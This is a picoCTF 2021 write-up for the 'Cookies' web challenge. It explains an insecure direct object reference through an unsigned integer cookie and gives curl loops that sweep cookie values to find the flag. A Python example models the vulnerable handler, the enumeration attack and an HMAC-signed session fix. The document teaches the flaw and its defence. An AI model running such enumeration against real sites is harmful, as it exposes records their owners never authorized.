Cookies picoCTF 2021 Solution

Published: April 2, 2026

Description

Who doesn't love cookies? Find the best cookie at this web challenge.

Remote

Navigate to the challenge URL and observe the cookie set by the server.

bash
# Visit the URL in your browser and check the cookies in DevTools (Application > Cookies)
  1. Step 1: Observe the name cookie
    When you visit the site, it sets a cookie named 'name' whose value is a plain integer (starting at 0). The server uses that integer as an index into its database of cookie names and renders whichever item it finds. Your job is to discover which integer maps to the flag entry, which you do by iterating through candidate values.

    HTTP cookies are key-value pairs stored by the browser and sent with every request to the server that set them. The server sets them with the Set-Cookie response header and the browser returns them in the Cookie request header. Here the cookie value is a bare integer with no signature, encryption or server-side session binding, so the client can set it to anything and the server will believe it.

  2. Step 2: Brute-force the cookie value
    Iterate the cookie value with curl (the -b flag sends a Cookie header) and grep each response body for the picoCTF prefix. 0-100 covers most CTF-scale databases; widen to 0-1000 if nothing hits.
    bash
    # Sweep 0-100 and print every ID whose response contains a flag:
    for i in $(seq 0 100); do flag=$(curl -s -b "name=$i" http://<server>/check | grep -oE 'picoCTF\{[^}]*\}'); [ -n "$flag" ] && echo "id=$i $flag"; done

    bash
    # If nothing matches, widen the range and stop at the first hit:
    for i in $(seq 0 1000); do flag=$(curl -s -b "name=$i" http://<server>/check | grep -oE 'picoCTF\{[^}]*\}'); [ -n "$flag" ] && echo "id=$i $flag" && break; done

    Why 0-100 first. Most CTF web apps seed their cookie database with a small ordered set of items, so the flag entry usually sits within the first hundred IDs; the challenge is meant to be solved in seconds, not hours. Widen to 0-1000 only if the small sweep produces nothing, and check that the server does not rate-limit or block you before assuming the range is wrong.

    Detect success on the response body, not the status code. A 200 response is not a success signal here: every integer, valid or not, returns 200. The signal is whether the page body contains the flag prefix. Piping through grep -oE 'picoCTF\{[^}]*\}' (the braces are escaped because in extended regex an unescaped { starts an interval quantifier) isolates the flag string and silently skips IDs that do not hold it.

    This is an insecure direct object reference (IDOR) exploited through unauthenticated enumeration. The server stores the flag at a specific ID in its cookie database and retrieves whatever the client-supplied integer points at, with no check that the client is entitled to that record. The fix: never use a client-supplied identifier alone as an authorization decision. Keep the identifier server-side in a session keyed by a random, unguessable session ID, and if state must live in the cookie, sign it (HMAC or a signed-session library) so tampering is detected and rejected. Note that enumeration is sequential IDs plus no access check; signing stops the tampering, the session lookup stops the enumeration. For more on cookie-related bug shapes, see cookies and JWTs in CTF.
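    The following is an added example, not code from the writeup or from the picoCTF challenge itself. It models both sides of the attack described in Steps 1-2 and the fix discussed above: a constructed stand-in for the vulnerable /check handler that indexes a list with the raw 'name' cookie, the attacker's enumeration loop (grep-for-the-flag logic in Python rather than curl), and a hardened handler that binds the entitlement to a random session ID carried in an HMAC-signed cookie. The database contents, the flag string, and the response texts are all constructed; the real server's table and the real flag are not known here.

```python
import hashlib
import hmac
import re
import secrets
from typing import Optional

# Constructed stand-in for the challenge's cookie database. The real table,
# and the index that holds the real flag, are not reproduced here.
FLAG = "picoCTF{constructed_example_flag}"
COOKIE_DB = ["snickerdoodle", "chocolate chip", "oatmeal raisin",
             "gingersnap", FLAG, "peanut butter"]

# Same pattern as the grep in Step 2; braces escaped so they are literal.
FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def parse_cookies(cookie_header: str) -> dict:
    """Split a 'k=v; k2=v2' Cookie header into a dict (values unverified)."""
    return dict(part.strip().split("=", 1)
                for part in cookie_header.split(";") if "=" in part)


def vulnerable_check(cookie_header: str) -> str:
    """Model of the vulnerable /check handler: the integer in the 'name'
    cookie is used directly as a database index with no authorization."""
    try:
        idx = int(parse_cookies(cookie_header).get("name", "-1"))
    except ValueError:
        idx = -1
    if not 0 <= idx < len(COOKIE_DB):
        return "<p>That is not a valid cookie.</p>"
    return f"<p>I love {COOKIE_DB[idx]} cookies!</p>"


def enumerate_flag(check, lo: int = 0, hi: int = 100) -> Optional[tuple]:
    """Attacker loop from Step 2: sweep name=lo..hi, test only the body for
    the flag format, return (id, flag) on the first hit or None."""
    for i in range(lo, hi + 1):
        m = FLAG_RE.search(check(f"name={i}"))
        if m:
            return i, m.group(0)
    return None


# --- hardened version: entitlement lives server-side, the cookie carries
# only a random session ID plus an HMAC the client cannot forge -----------
SERVER_SECRET = secrets.token_bytes(32)   # constructed; never leaves the server
SESSIONS: dict = {}                       # session id -> index the user may see


def _sign(sid: str) -> str:
    return hmac.new(SERVER_SECRET, sid.encode(), hashlib.sha256).hexdigest()


def issue_cookie(entitled_idx: int) -> str:
    """Server creates a session for one record and returns the Set-Cookie value."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = entitled_idx
    return f"session={sid}.{_sign(sid)}"


def hardened_check(cookie_header: str) -> str:
    """Hardened handler: verify the signature in constant time, then look the
    record up via the server-side session. A 'name=<int>' cookie is ignored."""
    sid, _, sig = parse_cookies(cookie_header).get("session", "").partition(".")
    if not sig or not hmac.compare_digest(sig, _sign(sid)) or sid not in SESSIONS:
        return "<p>That is not a valid cookie.</p>"
    return f"<p>I love {COOKIE_DB[SESSIONS[sid]]} cookies!</p>"


def tamper(cookie: str) -> str:
    """Flip the last hex digit of the signature, modelling a forged cookie."""
    return cookie[:-1] + ("0" if cookie[-1] != "0" else "1")


if __name__ == "__main__":
    print(enumerate_flag(vulnerable_check))   # finds the index holding FLAG
    print(enumerate_flag(hardened_check))     # None: integers are no longer IDs
    legit = issue_cookie(0)
    print(hardened_check(legit))              # the entitled record is served
    print(hardened_check(tamper(legit)))      # tampered signature is rejected
```

    Running the script shows the two halves of the fix separately: the sweep against hardened_check returns None because a bare integer is never consulted, and a cookie with a flipped signature digit fails the compare_digest check even though its session ID exists. The lookup table, secret and session store are in-process here purely so the example runs offline.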

Flag

picoCTF{...}

The server maps integer cookie values to items in its database and performs no authorization check on the client-supplied integer, so brute-forcing the integer reveals which value corresponds to the flag entry.
